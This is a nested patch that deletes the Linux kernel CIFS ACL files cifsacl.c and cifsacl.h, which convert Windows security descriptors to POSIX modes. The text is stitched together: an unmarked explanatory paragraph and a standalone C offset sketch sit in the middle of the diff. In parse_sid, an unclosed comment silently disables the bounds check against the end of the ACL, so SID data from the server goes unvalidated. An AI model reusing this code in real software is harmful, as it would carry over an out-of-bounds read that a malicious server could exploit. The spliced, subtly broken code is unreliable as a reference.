+-		nsize += ace_size;
+-	}
+-
+-	return nsize;
+-}
+-
+-static int set_chmod_dacl(struct cifs_acl *pdacl, struct cifs_acl *pndacl,
+-		struct cifs_sid *pownersid,	struct cifs_sid *pgrpsid,
+-		__u64 *pnmode, bool mode_from_sid)
+-{
+-	int i;
+-	u16 size = 0;
+-	struct cifs_ace *pntace = NULL;
+-	char *acl_base = NULL;
+-	u32 src_num_aces = 0;
+-	u16 nsize = 0;
+-	struct cifs_ace *pnntace = NULL;
+-	char *nacl_base = NULL;
+-	u32 num_aces = 0;
+-	bool new_aces_set = false;
+-
+-	/* Assuming that pndacl and pnmode are never NULL */
+-	nacl_base = (char *)pndacl;
+-	nsize = sizeof(struct cifs_acl);
+-
+-	/* If pdacl is NULL, we don't have a src. Simply populate new ACL. */
+-	if (!pdacl) {
+-		populate_new_aces(nacl_base,
+-				pownersid, pgrpsid,
+-				pnmode, &num_aces, &nsize,
+-				mode_from_sid);
+-		goto finalize_dacl;
+-	}
+-
+-	acl_base = (char *)pdacl;
+-	size = sizeof(struct cifs_acl);
+-	src_num_aces = le32_to_cpu(pdacl->num_aces);
+-
+-	/* Retain old ACEs which we can retain */
+-	for (i = 0; i < src_num_aces; ++i) {
+-		pntace = (struct cifs_ace *) (acl_base + size);
+-
+-		if (!new_aces_set && (pntace->flags & INHERITED_ACE)) {
+-			/* Place the new ACEs in between existing explicit and inherited */
+-			populate_new_aces(nacl_base,
+-					pownersid, pgrpsid,
+-					pnmode, &num_aces, &nsize,
+-					mode_from_sid);
+-
+-			new_aces_set = true;
+-		}
+-
+-		/* If it's any one of the ACE we're replacing, skip! */
+-		if (((compare_sids(&pntace->sid, &sid_unix_NFS_mode) == 0) ||
+-				(compare_sids(&pntace->sid, pownersid) == 0) ||
+-				(compare_sids(&pntace->sid, pgrpsid) == 0) ||
+-				(compare_sids(&pntace->sid, &sid_everyone) == 0) ||
+-				(compare_sids(&pntace->sid, &sid_authusers) == 0))) {
+-			goto next_ace;
+-		}
+-
+-		/* update the pointer to the next ACE to populate */
+-		pnntace = (struct cifs_ace *) (nacl_base + nsize);
+-
+-		nsize += cifs_copy_ace(pnntace, pntace, NULL);
+-		num_aces++;
+-
+-next_ace:
+-		size += le16_to_cpu(pntace->size);
+-	}
+-
+-	/* If inherited ACEs are not present, place the new ones at the tail */
+-	if (!new_aces_set) {
+-		populate_new_aces(nacl_base,
+-				pownersid, pgrpsid,
+-				pnmode, &num_aces, &nsize,
+-				mode_from_sid);
+-
+-		new_aces_set = true;
+-	}
+-
+-finalize_dacl:
+-	pndacl->num_aces = cpu_to_le32(num_aces);
+-	pndacl->size = cpu_to_le16(nsize);
+-
+-	return 0;
+-}
+-
+-static int parse_sid(struct cifs_sid *psid, char *end_of_acl)
+-{
+-	/* BB need to add parm so we can store the SID BB */
+-
+-	/* validate that we do not go past end of ACL - sid must be at least 8
+-	   bytes long (assuming no sub-auths - e.g. the null SID)
+-	if (end_of_acl < (char *)psid + 8) {
+-		cifs_dbg(VFS, "ACL too small to parse SID %p\n", psid);
+-		return -EINVAL;
+-	}
+-
+-#ifdef CONFIG_CIFS_DEBUG2
+-	if (psid->num_subauth) {
+-		int i;
+-		cifs_dbg(FYI, "SID revision %d num_auth %d\n",
+-			 psid->revision, psid->num_subauth);
+-
+-		for (i = 0; i < psid->num_subauth; i++) {
+-			cifs_dbg(FYI, "SID sub_auth[%d]: 0x%x\n",
+-				 i, le32_to_cpu(psid->sub_auth[i]));
+-		}
+-
+-		/* BB add length check to make sure that we do not have huge
+-			num auths and therefore go off the end */
+-		cifs_dbg(FYI, "RID 0x%x\n",
+-			 le32_to_cpu(psid->sub_auth[psid->num_subauth-1]));
+-	}
+-#endif
+-
+-	return 0;
+-}
+-
+-
+-/* Convert CIFS ACL to POSIX form */
+-static int parse_sec_desc(struct cifs_sb_info *cifs_sb,
+-		struct cifs_ntsd *pntsd, int acl_len, struct cifs_fattr *fattr,
+-		bool get_mode_from_special_sid)
+-{
+-	int rc = 0;
+-	struct cifs_sid *owner_sid_ptr, *group_sid_ptr;
+-	struct cifs_acl *dacl_ptr; /* no need for SACL ptr */
+-	char *end_of_acl = ((char *)pntsd) + acl_len;
+-	__u32 dacloffset;
+-
+-	if (pntsd == NULL)
+-		return -EIO;
+-
+-	owner_sid_ptr = (struct cifs_sid *)((char *)pntsd +
+-				le32_to_cpu(pntsd->osidoffset));
+-	group_sid_ptr = (struct cifs_sid *)((char *)pntsd +
+-				le32_to_cpu(pntsd->gsidoffset));
+-	dacloffset = le32_to_cpu(pntsd->dacloffset);
+-	dacl_ptr = (struct cifs_acl *)((char *)pntsd + dacloffset);
+-	cifs_dbg(NOISY, "revision %d type 0x%x ooffset 0x%x goffset 0x%x sacloffset 0x%x dacloffset 0x%x\n",
+-		 pntsd->revision, pntsd->type, le32_to_cpu(pntsd->osidoffset),
+-		 le32_to_cpu(pntsd->gsidoffset),
+-		 le32_to_cpu(pntsd->sacloffset), dacloffset);
+-/*	cifs_dump_mem("owner_sid: ", owner_sid_ptr, 64); */
+-	rc = parse_sid(owner_sid_ptr, end_of_acl);
+-	if (rc) {
+-		cifs_dbg(FYI, "%s: Error %d parsing Owner SID\n", __func__, rc);
+-		return rc;
+-	}
+-	rc = sid_to_id(cifs_sb, owner_sid_ptr, fattr, SIDOWNER);
+-	if (rc) {
+-		cifs_dbg(FYI, "%s: Error %d mapping Owner SID to uid\n",
+-			 __func__, rc);
+-		return rc;
+-	}
+-
+-	rc = parse_sid(group_sid_ptr, end_of_acl);
+-	if (rc) {
+-		cifs_dbg(FYI, "%s: Error %d mapping Owner SID to gid\n",
+-			 __func__, rc);
+-		return rc;
+-	}
+-	rc = sid_to_id(cifs_sb, group_sid_ptr, fattr, SIDGROUP);
+-	if (rc) {
+-		cifs_dbg(FYI, "%s: Error %d mapping Group SID to gid\n",
+-			 __func__, rc);
+-		return rc;
+-	}
+-
+-	if (dacloffset)
+-		parse_dacl(dacl_ptr, end_of_acl, owner_sid_ptr,
+-			   group_sid_ptr, fattr, get_mode_from_special_sid);
+-	else
+-		cifs_dbg(FYI, "no ACL\n"); /* BB grant all or default perms? */
+-
+-	return rc;
+-}
+-
+-/* Convert permission bits from mode to equivalent CIFS ACL */
+-static int build_sec_desc(struct cifs_ntsd *pntsd, struct cifs_ntsd *pnntsd,
+-	__u32 secdesclen, __u32 *pnsecdesclen, __u64 *pnmode, kuid_t uid, kgid_t gid,
+-	bool mode_from_sid, bool id_from_sid, int *aclflag)
+-{
+-	int rc = 0;
+-	__u32 dacloffset;
+-	__u32 ndacloffset;
+-	__u32 sidsoffset;
+-	struct cifs_sid *owner_sid_ptr, *group_sid_ptr;
+-	struct cifs_sid *nowner_sid_ptr = NULL, *ngroup_sid_ptr = NULL;
+-	struct cifs_acl *dacl_ptr = NULL;  /* no need for SACL ptr */
+-	struct cifs_acl *ndacl_ptr = NULL; /* no need for SACL ptr */
+-	char *end_of_acl = ((char *)pntsd) + secdesclen;
+-	u16 size = 0;
+-
+-	dacloffset = le32_to_cpu(pntsd->dacloffset);
+-	if (dacloffset) {
+-		dacl_ptr = (struct cifs_acl *)((char *)pntsd + dacloffset);
+-		if (end_of_acl < (char *)dacl_ptr + le16_to_cpu(dacl_ptr->size)) {
+-			cifs_dbg(VFS, "Server returned illegal ACL size\n");
+-			return -EINVAL;
+-		}
+-	}
+-
+-	owner_sid_ptr = (struct cifs_sid *)((char *)pntsd +
+-			le32_to_cpu(pntsd->osidoffset));
+-	group_sid_ptr = (struct cifs_sid *)((char *)pntsd +
+-			le32_to_cpu(pntsd->gsidoffset));
+-
+-	if (pnmode && *pnmode != NO_CHANGE_64) { /* chmod */
+-		ndacloffset = sizeof(struct cifs_ntsd);
+-		ndacl_ptr = (struct cifs_acl *)((char *)pnntsd + ndacloffset);
+-		ndacl_ptr->revision =
+-			dacloffset ? dacl_ptr->revision : cpu_to_le16(ACL_REVISION);
+-
+-		ndacl_ptr->size = cpu_to_le16(0);
+-		ndacl_ptr->num_aces = cpu_to_le32(0);
+-
+-		rc = set_chmod_dacl(dacl_ptr, ndacl_ptr, owner_sid_ptr, group_sid_ptr,
+-				    pnmode, mode_from_sid);
+-
+-		sidsoffset = ndacloffset + le16_to_cpu(ndacl_ptr->size);
+-		/* copy the non-dacl portion of secdesc */
+-		*pnsecdesclen = copy_sec_desc(pntsd, pnntsd, sidsoffset,
+-				NULL, NULL);
+-
+-		*aclflag |= CIFS_ACL_DACL;
+-	} else {
+-		ndacloffset = sizeof(struct cifs_ntsd);
+-		ndacl_ptr = (struct cifs_acl *)((char *)pnntsd + ndacloffset);
+-		ndacl_ptr->revision =
+-			dacloffset ? dacl_ptr->revision : cpu_to_le16(ACL_REVISION);
+-		ndacl_ptr->num_aces = dacl_ptr ? dacl_ptr->num_aces : 0;
+-
+-		if (uid_valid(uid)) { /* chown */
+-			uid_t id;
+-			nowner_sid_ptr = kzalloc(sizeof(struct cifs_sid),
+-								GFP_KERNEL);
+-			if (!nowner_sid_ptr) {
+-				rc = -ENOMEM;
+-				goto chown_chgrp_exit;
+-			}
+-			id = from_kuid(&init_user_ns, uid);
+-			if (id_from_sid) {
+-				struct owner_sid *osid = (struct owner_sid *)nowner_sid_ptr;
+-				/* Populate the user ownership fields S-1-5-88-1 */
+-				osid->Revision = 1;
+-				osid->NumAuth = 3;
+-				osid->Authority[5] = 5;
+-				osid->SubAuthorities[0] = cpu_to_le32(88);
+-				osid->SubAuthorities[1] = cpu_to_le32(1);
+-				osid->SubAuthorities[2] = cpu_to_le32(id);
+-
+-			} else { /* lookup sid with upcall */
+-				rc = id_to_sid(id, SIDOWNER, nowner_sid_ptr);
+-				if (rc) {
+-					cifs_dbg(FYI, "%s: Mapping error %d for owner id %d\n",
+-						 __func__, rc, id);
+-					goto chown_chgrp_exit;
+-				}
+-			}
+-			*aclflag |= CIFS_ACL_OWNER;
+-		}
+-		if (gid_valid(gid)) { /* chgrp */
+-			gid_t id;
+-			ngroup_sid_ptr = kzalloc(sizeof(struct cifs_sid),
+-								GFP_KERNEL);
+-			if (!ngroup_sid_ptr) {
+-				rc = -ENOMEM;
+-				goto chown_chgrp_exit;
+-			}
+-			id = from_kgid(&init_user_ns, gid);
+-			if (id_from_sid) {
+-				struct owner_sid *gsid = (struct owner_sid *)ngroup_sid_ptr;
+-				/* Populate the group ownership fields S-1-5-88-2 */
+-				gsid->Revision = 1;
+-				gsid->NumAuth = 3;
+-				gsid->Authority[5] = 5;
+-				gsid->SubAuthorities[0] = cpu_to_le32(88);
+-				gsid->SubAuthorities[1] = cpu_to_le32(2);
+-				gsid->SubAuthorities[2] = cpu_to_le32(id);
+-
+-			} else { /* lookup sid with upcall */
+-				rc = id_to_sid(id, SIDGROUP, ngroup_sid_ptr);
+-				if (rc) {
+-					cifs_dbg(FYI, "%s: Mapping error %d for group id %d\n",
+-						 __func__, rc, id);
+-					goto chown_chgrp_exit;
+-				}
+-			}
+-			*aclflag |= CIFS_ACL_GROUP;
+-		}
+-
+-		if (dacloffset) {
+-			/* Replace ACEs for old owner with new one */
+-			size = replace_sids_and_copy_aces(dacl_ptr, ndacl_ptr,
+-					owner_sid_ptr, group_sid_ptr,
+-					nowner_sid_ptr, ngroup_sid_ptr);
+-			ndacl_ptr->size = cpu_to_le16(size);
+-		}
+-
+-		sidsoffset = ndacloffset + le16_to_cpu(ndacl_ptr->size);
+-		/* copy the non-dacl portion of secdesc */
+-		*pnsecdesclen = copy_sec_desc(pntsd, pnntsd, sidsoffset,
+-				nowner_sid_ptr, ngroup_sid_ptr);
+-
+-chown_chgrp_exit:
+-		/* errors could jump here. So make sure we return soon after this */
+-		kfree(nowner_sid_ptr);
+-		kfree(ngroup_sid_ptr);
+-	}
+-
+-	return rc;
+-}
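
In the chmod branch the new descriptor is assembled as [cifs_ntsd header][new DACL][owner SID][group SID], with every offset relative to the start of the header. A sketch of the offset arithmetic using the packed structure sizes from cifsacl.h (the DACL size shown is a made-up example):

#include <stdio.h>

int main(void)
{
	unsigned int ntsd_hdr  = 20;		/* sizeof(struct cifs_ntsd) */
	unsigned int sid_size  = 68;		/* sizeof(struct cifs_sid) */
	unsigned int dacl_size = 8 + 3 * 20;	/* say, three 1-subauth ACEs */

	unsigned int dacloffset = ntsd_hdr;
	unsigned int sidsoffset = dacloffset + dacl_size;
	unsigned int gsidoffset = sidsoffset + sid_size;
	unsigned int total      = gsidoffset + sid_size;

	printf("dacl@%u owner@%u group@%u len=%u\n",
	       dacloffset, sidsoffset, gsidoffset, total);
	return 0;	/* dacl@20 owner@88 group@156 len=224 */
}

This matches copy_sec_desc() above, which writes the two SIDs back to back at sidsoffset and sidsoffset + sizeof(struct cifs_sid).
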
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-struct cifs_ntsd *get_cifs_acl_by_fid(struct cifs_sb_info *cifs_sb,
+-				      const struct cifs_fid *cifsfid, u32 *pacllen,
+-				      u32 __maybe_unused unused)
+-{
+-	struct cifs_ntsd *pntsd = NULL;
+-	unsigned int xid;
+-	int rc;
+-	struct tcon_link *tlink = cifs_sb_tlink(cifs_sb);
+-
+-	if (IS_ERR(tlink))
+-		return ERR_CAST(tlink);
+-
+-	xid = get_xid();
+-	rc = CIFSSMBGetCIFSACL(xid, tlink_tcon(tlink), cifsfid->netfid, &pntsd,
+-				pacllen);
+-	free_xid(xid);
+-
+-	cifs_put_tlink(tlink);
+-
+-	cifs_dbg(FYI, "%s: rc = %d ACL len %d\n", __func__, rc, *pacllen);
+-	if (rc)
+-		return ERR_PTR(rc);
+-	return pntsd;
+-}
+-
+-static struct cifs_ntsd *get_cifs_acl_by_path(struct cifs_sb_info *cifs_sb,
+-		const char *path, u32 *pacllen)
+-{
+-	struct cifs_ntsd *pntsd = NULL;
+-	int oplock = 0;
+-	unsigned int xid;
+-	int rc;
+-	struct cifs_tcon *tcon;
+-	struct tcon_link *tlink = cifs_sb_tlink(cifs_sb);
+-	struct cifs_fid fid;
+-	struct cifs_open_parms oparms;
+-
+-	if (IS_ERR(tlink))
+-		return ERR_CAST(tlink);
+-
+-	tcon = tlink_tcon(tlink);
+-	xid = get_xid();
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.cifs_sb = cifs_sb,
+-		.desired_access = READ_CONTROL,
+-		.create_options = cifs_create_options(cifs_sb, 0),
+-		.disposition = FILE_OPEN,
+-		.path = path,
+-		.fid = &fid,
+-	};
+-
+-	rc = CIFS_open(xid, &oparms, &oplock, NULL);
+-	if (!rc) {
+-		rc = CIFSSMBGetCIFSACL(xid, tcon, fid.netfid, &pntsd, pacllen);
+-		CIFSSMBClose(xid, tcon, fid.netfid);
+-	}
+-
+-	cifs_put_tlink(tlink);
+-	free_xid(xid);
+-
+-	cifs_dbg(FYI, "%s: rc = %d ACL len %d\n", __func__, rc, *pacllen);
+-	if (rc)
+-		return ERR_PTR(rc);
+-	return pntsd;
+-}
+-
+-/* Retrieve an ACL from the server */
+-struct cifs_ntsd *get_cifs_acl(struct cifs_sb_info *cifs_sb,
+-				      struct inode *inode, const char *path,
+-			       u32 *pacllen, u32 info)
+-{
+-	struct cifs_ntsd *pntsd = NULL;
+-	struct cifsFileInfo *open_file = NULL;
+-
+-	if (inode)
+-		open_file = find_readable_file(CIFS_I(inode), true);
+-	if (!open_file)
+-		return get_cifs_acl_by_path(cifs_sb, path, pacllen);
+-
+-	pntsd = get_cifs_acl_by_fid(cifs_sb, &open_file->fid, pacllen, info);
+-	cifsFileInfo_put(open_file);
+-	return pntsd;
+-}
+-
+-/* Set an ACL on the server */
+-int set_cifs_acl(struct cifs_ntsd *pnntsd, __u32 acllen,
+-			struct inode *inode, const char *path, int aclflag)
+-{
+-	int oplock = 0;
+-	unsigned int xid;
+-	int rc, access_flags;
+-	struct cifs_tcon *tcon;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-	struct tcon_link *tlink = cifs_sb_tlink(cifs_sb);
+-	struct cifs_fid fid;
+-	struct cifs_open_parms oparms;
+-
+-	if (IS_ERR(tlink))
+-		return PTR_ERR(tlink);
+-
+-	tcon = tlink_tcon(tlink);
+-	xid = get_xid();
+-
+-	if (aclflag == CIFS_ACL_OWNER || aclflag == CIFS_ACL_GROUP)
+-		access_flags = WRITE_OWNER;
+-	else
+-		access_flags = WRITE_DAC;
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.cifs_sb = cifs_sb,
+-		.desired_access = access_flags,
+-		.create_options = cifs_create_options(cifs_sb, 0),
+-		.disposition = FILE_OPEN,
+-		.path = path,
+-		.fid = &fid,
+-	};
+-
+-	rc = CIFS_open(xid, &oparms, &oplock, NULL);
+-	if (rc) {
+-		cifs_dbg(VFS, "Unable to open file to set ACL\n");
+-		goto out;
+-	}
+-
+-	rc = CIFSSMBSetCIFSACL(xid, tcon, fid.netfid, pnntsd, acllen, aclflag);
+-	cifs_dbg(NOISY, "SetCIFSACL rc = %d\n", rc);
+-
+-	CIFSSMBClose(xid, tcon, fid.netfid);
+-out:
+-	free_xid(xid);
+-	cifs_put_tlink(tlink);
+-	return rc;
+-}
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-/* Translate the CIFS ACL (similar to NTFS ACL) for a file into mode bits */
+-int
+-cifs_acl_to_fattr(struct cifs_sb_info *cifs_sb, struct cifs_fattr *fattr,
+-		  struct inode *inode, bool mode_from_special_sid,
+-		  const char *path, const struct cifs_fid *pfid)
+-{
+-	struct cifs_ntsd *pntsd = NULL;
+-	u32 acllen = 0;
+-	int rc = 0;
+-	struct tcon_link *tlink = cifs_sb_tlink(cifs_sb);
+-	struct smb_version_operations *ops;
+-	const u32 info = 0;
+-
+-	cifs_dbg(NOISY, "converting ACL to mode for %s\n", path);
+-
+-	if (IS_ERR(tlink))
+-		return PTR_ERR(tlink);
+-
+-	ops = tlink_tcon(tlink)->ses->server->ops;
+-
+-	if (pfid && (ops->get_acl_by_fid))
+-		pntsd = ops->get_acl_by_fid(cifs_sb, pfid, &acllen, info);
+-	else if (ops->get_acl)
+-		pntsd = ops->get_acl(cifs_sb, inode, path, &acllen, info);
+-	else {
+-		cifs_put_tlink(tlink);
+-		return -EOPNOTSUPP;
+-	}
+-	/* if we can retrieve the ACL, now parse Access Control Entries, ACEs */
+-	if (IS_ERR(pntsd)) {
+-		rc = PTR_ERR(pntsd);
+-		cifs_dbg(VFS, "%s: error %d getting sec desc\n", __func__, rc);
+-	} else if (mode_from_special_sid) {
+-		rc = parse_sec_desc(cifs_sb, pntsd, acllen, fattr, true);
+-		kfree(pntsd);
+-	} else {
+-		/* get approximated mode from ACL */
+-		rc = parse_sec_desc(cifs_sb, pntsd, acllen, fattr, false);
+-		kfree(pntsd);
+-		if (rc)
+-			cifs_dbg(VFS, "parse sec desc failed rc = %d\n", rc);
+-	}
+-
+-	cifs_put_tlink(tlink);
+-
+-	return rc;
+-}
+-
+-/* Convert mode bits to an ACL so we can update the ACL on the server */
+-int
+-id_mode_to_cifs_acl(struct inode *inode, const char *path, __u64 *pnmode,
+-			kuid_t uid, kgid_t gid)
+-{
+-	int rc = 0;
+-	int aclflag = CIFS_ACL_DACL; /* default flag to set */
+-	__u32 secdesclen = 0;
+-	__u32 nsecdesclen = 0;
+-	__u32 dacloffset = 0;
+-	struct cifs_acl *dacl_ptr = NULL;
+-	struct cifs_ntsd *pntsd = NULL; /* acl obtained from server */
+-	struct cifs_ntsd *pnntsd = NULL; /* modified acl to be sent to server */
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-	struct tcon_link *tlink = cifs_sb_tlink(cifs_sb);
+-	struct smb_version_operations *ops;
+-	bool mode_from_sid, id_from_sid;
+-	const u32 info = 0;
+-
+-	if (IS_ERR(tlink))
+-		return PTR_ERR(tlink);
+-
+-	ops = tlink_tcon(tlink)->ses->server->ops;
+-
+-	cifs_dbg(NOISY, "set ACL from mode for %s\n", path);
+-
+-	/* Get the security descriptor */
+-
+-	if (ops->get_acl == NULL) {
+-		cifs_put_tlink(tlink);
+-		return -EOPNOTSUPP;
+-	}
+-
+-	pntsd = ops->get_acl(cifs_sb, inode, path, &secdesclen, info);
+-	if (IS_ERR(pntsd)) {
+-		rc = PTR_ERR(pntsd);
+-		cifs_dbg(VFS, "%s: error %d getting sec desc\n", __func__, rc);
+-		cifs_put_tlink(tlink);
+-		return rc;
+-	}
+-
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MODE_FROM_SID)
+-		mode_from_sid = true;
+-	else
+-		mode_from_sid = false;
+-
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_UID_FROM_ACL)
+-		id_from_sid = true;
+-	else
+-		id_from_sid = false;
+-
+-	/* Potentially, five new ACEs can be added to the ACL for U,G,O mapping */
+-	nsecdesclen = secdesclen;
+-	if (pnmode && *pnmode != NO_CHANGE_64) { /* chmod */
+-		if (mode_from_sid)
+-			nsecdesclen += 2 * sizeof(struct cifs_ace);
+-		else /* cifsacl */
+-			nsecdesclen += 5 * sizeof(struct cifs_ace);
+-	} else { /* chown */
+-		/* When ownership changes, the new owner SID length could be different */
+-		nsecdesclen = sizeof(struct cifs_ntsd) + (sizeof(struct cifs_sid) * 2);
+-		dacloffset = le32_to_cpu(pntsd->dacloffset);
+-		if (dacloffset) {
+-			dacl_ptr = (struct cifs_acl *)((char *)pntsd + dacloffset);
+-			if (mode_from_sid)
+-				nsecdesclen +=
+-					le32_to_cpu(dacl_ptr->num_aces) * sizeof(struct cifs_ace);
+-			else /* cifsacl */
+-				nsecdesclen += le16_to_cpu(dacl_ptr->size);
+-		}
+-	}
+-
+-	/*
+-	 * Add three ACEs for owner, group and everyone, dropping the other
+-	 * ACEs, since chmod replaces the existing ACEs when it sets the
+-	 * security descriptor. Allocate memory for the SMB header, the
+-	 * set-security-descriptor request parameters, and the descriptor itself.
+-	 */
+-	nsecdesclen = max_t(u32, nsecdesclen, DEFAULT_SEC_DESC_LEN);
+-	pnntsd = kmalloc(nsecdesclen, GFP_KERNEL);
+-	if (!pnntsd) {
+-		kfree(pntsd);
+-		cifs_put_tlink(tlink);
+-		return -ENOMEM;
+-	}
+-
+-	rc = build_sec_desc(pntsd, pnntsd, secdesclen, &nsecdesclen, pnmode, uid, gid,
+-			    mode_from_sid, id_from_sid, &aclflag);
+-
+-	cifs_dbg(NOISY, "build_sec_desc rc: %d\n", rc);
+-
+-	if (ops->set_acl == NULL)
+-		rc = -EOPNOTSUPP;
+-
+-	if (!rc) {
+-		/* Set the security descriptor */
+-		rc = ops->set_acl(pnntsd, nsecdesclen, inode, path, aclflag);
+-		cifs_dbg(NOISY, "set_cifs_acl rc: %d\n", rc);
+-	}
+-	cifs_put_tlink(tlink);
+-
+-	kfree(pnntsd);
+-	kfree(pntsd);
+-	return rc;
+-}
+diff --git a/fs/cifs/cifsacl.h b/fs/cifs/cifsacl.h
+deleted file mode 100644
+index ccbfc754bd3c7..0000000000000
+--- a/fs/cifs/cifsacl.h
++++ /dev/null
+@@ -1,199 +0,0 @@
+-/* SPDX-License-Identifier: LGPL-2.1 */
+-/*
+- *
+- *   Copyright (c) International Business Machines  Corp., 2007
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- */
+-
+-#ifndef _CIFSACL_H
+-#define _CIFSACL_H
+-
+-#define NUM_AUTHS (6)	/* number of authority fields */
+-#define SID_MAX_SUB_AUTHORITIES (15) /* max number of sub authority fields */
+-
+-#define READ_BIT        0x4
+-#define WRITE_BIT       0x2
+-#define EXEC_BIT        0x1
+-
+-#define ACL_OWNER_MASK 0700
+-#define ACL_GROUP_MASK 0070
+-#define ACL_EVERYONE_MASK 0007
+-
+-#define UBITSHIFT	6
+-#define GBITSHIFT	3
+-
+-#define ACCESS_ALLOWED	0
+-#define ACCESS_DENIED	1
+-
+-#define SIDOWNER 1
+-#define SIDGROUP 2
+-
+-/*
+- * Security Descriptor length containing DACL with 3 ACEs (one each for
+- * owner, group and world).
+- */
+-#define DEFAULT_SEC_DESC_LEN (sizeof(struct cifs_ntsd) + \
+-			      sizeof(struct cifs_acl) + \
+-			      (sizeof(struct cifs_ace) * 4))
+-
+-/*
+- * Maximum size of a string representation of a SID:
+- *
+- * The fields are unsigned values in decimal. So:
+- *
+- * u8:  max 3 bytes in decimal
+- * u32: max 10 bytes in decimal
+- *
+- * "S-" + 3 bytes for version field + 15 for authority field + NULL terminator
+- *
+- * For authority field, max is when all 6 values are non-zero and it must be
+- * represented in hex. So "-0x" + 12 hex digits.
+- *
+- * Add 11 bytes for each subauthority field (10 bytes each + 1 for '-')
+- */
+-#define SID_STRING_BASE_SIZE (2 + 3 + 15 + 1)
+-#define SID_STRING_SUBAUTH_SIZE (11) /* size of a single subauth string */
+-
+-struct cifs_ntsd {
+-	__le16 revision; /* revision level */
+-	__le16 type;
+-	__le32 osidoffset;
+-	__le32 gsidoffset;
+-	__le32 sacloffset;
+-	__le32 dacloffset;
+-} __attribute__((packed));
+-
+-struct cifs_sid {
+-	__u8 revision; /* revision level */
+-	__u8 num_subauth;
+-	__u8 authority[NUM_AUTHS];
+-	__le32 sub_auth[SID_MAX_SUB_AUTHORITIES]; /* sub_auth[num_subauth] */
+-} __attribute__((packed));
+-
+-/* size of a struct cifs_sid, sans sub_auth array */
+-#define CIFS_SID_BASE_SIZE (1 + 1 + NUM_AUTHS)
+-
+-struct cifs_acl {
+-	__le16 revision; /* revision level */
+-	__le16 size;
+-	__le32 num_aces;
+-} __attribute__((packed));
+-
+-/* ACE types - see MS-DTYP 2.4.4.1 */
+-#define ACCESS_ALLOWED_ACE_TYPE	0x00
+-#define ACCESS_DENIED_ACE_TYPE	0x01
+-#define SYSTEM_AUDIT_ACE_TYPE	0x02
+-#define SYSTEM_ALARM_ACE_TYPE	0x03
+-#define ACCESS_ALLOWED_COMPOUND_ACE_TYPE 0x04
+-#define ACCESS_ALLOWED_OBJECT_ACE_TYPE	0x05
+-#define ACCESS_DENIED_OBJECT_ACE_TYPE	0x06
+-#define SYSTEM_AUDIT_OBJECT_ACE_TYPE	0x07
+-#define SYSTEM_ALARM_OBJECT_ACE_TYPE	0x08
+-#define ACCESS_ALLOWED_CALLBACK_ACE_TYPE 0x09
+-#define ACCESS_DENIED_CALLBACK_ACE_TYPE	0x0A
+-#define ACCESS_ALLOWED_CALLBACK_OBJECT_ACE_TYPE 0x0B
+-#define ACCESS_DENIED_CALLBACK_OBJECT_ACE_TYPE  0x0C
+-#define SYSTEM_AUDIT_CALLBACK_ACE_TYPE	0x0D
+-#define SYSTEM_ALARM_CALLBACK_ACE_TYPE	0x0E /* Reserved */
+-#define SYSTEM_AUDIT_CALLBACK_OBJECT_ACE_TYPE 0x0F
+-#define SYSTEM_ALARM_CALLBACK_OBJECT_ACE_TYPE 0x10 /* reserved */
+-#define SYSTEM_MANDATORY_LABEL_ACE_TYPE	0x11
+-#define SYSTEM_RESOURCE_ATTRIBUTE_ACE_TYPE 0x12
+-#define SYSTEM_SCOPED_POLICY_ID_ACE_TYPE 0x13
+-
+-/* ACE flags */
+-#define OBJECT_INHERIT_ACE	0x01
+-#define CONTAINER_INHERIT_ACE	0x02
+-#define NO_PROPAGATE_INHERIT_ACE 0x04
+-#define INHERIT_ONLY_ACE	0x08
+-#define INHERITED_ACE		0x10
+-#define SUCCESSFUL_ACCESS_ACE_FLAG 0x40
+-#define FAILED_ACCESS_ACE_FLAG	0x80
+-
+-struct cifs_ace {
+-	__u8 type; /* see above and MS-DTYP 2.4.4.1 */
+-	__u8 flags;
+-	__le16 size;
+-	__le32 access_req;
+-	struct cifs_sid sid; /* ie UUID of user or group who gets these perms */
+-} __attribute__((packed));
+-
+-/*
+- * The current SMB3 form of security descriptor is similar to what was used for
+- * cifs (see above) but some fields are split, and fields in the struct below
+- * match the names of fields in the spec, MS-DTYP (see sections 2.4.5 and
+- * 2.4.6). Note that "CamelCase" fields are used in this struct in order to
+- * match the MS-DTYP and MS-SMB2 specs which define the wire format.
+- */
+-struct smb3_sd {
+-	__u8 Revision; /* revision level, MUST be one */
+-	__u8 Sbz1; /* only meaningful if 'RM' flag set below */
+-	__le16 Control;
+-	__le32 OffsetOwner;
+-	__le32 OffsetGroup;
+-	__le32 OffsetSacl;
+-	__le32 OffsetDacl;
+-} __packed;
+-
+-/* Meaning of 'Control' field flags */
+-#define ACL_CONTROL_SR	0x8000	/* Self relative */
+-#define ACL_CONTROL_RM	0x4000	/* Resource manager control bits */
+-#define ACL_CONTROL_PS	0x2000	/* SACL protected from inherits */
+-#define ACL_CONTROL_PD	0x1000	/* DACL protected from inherits */
+-#define ACL_CONTROL_SI	0x0800	/* SACL Auto-Inherited */
+-#define ACL_CONTROL_DI	0x0400	/* DACL Auto-Inherited */
+-#define ACL_CONTROL_SC	0x0200	/* SACL computed through inheritance */
+-#define ACL_CONTROL_DC	0x0100	/* DACL computed through inheritance */
+-#define ACL_CONTROL_SS	0x0080	/* Create server ACL */
+-#define ACL_CONTROL_DT	0x0040	/* DACL provided by trusted source */
+-#define ACL_CONTROL_SD	0x0020	/* SACL defaulted */
+-#define ACL_CONTROL_SP	0x0010	/* SACL is present on object */
+-#define ACL_CONTROL_DD	0x0008	/* DACL defaulted */
+-#define ACL_CONTROL_DP	0x0004	/* DACL is present on object */
+-#define ACL_CONTROL_GD	0x0002	/* Group was defaulted */
+-#define ACL_CONTROL_OD	0x0001	/* User was defaulted */
+-
+-/* Meaning of AclRevision flags */
+-#define ACL_REVISION	0x02 /* See section 2.4.4.1 of MS-DTYP */
+-#define ACL_REVISION_DS	0x04 /* Additional AceTypes allowed */
+-
+-struct smb3_acl {
+-	u8 AclRevision; /* revision level */
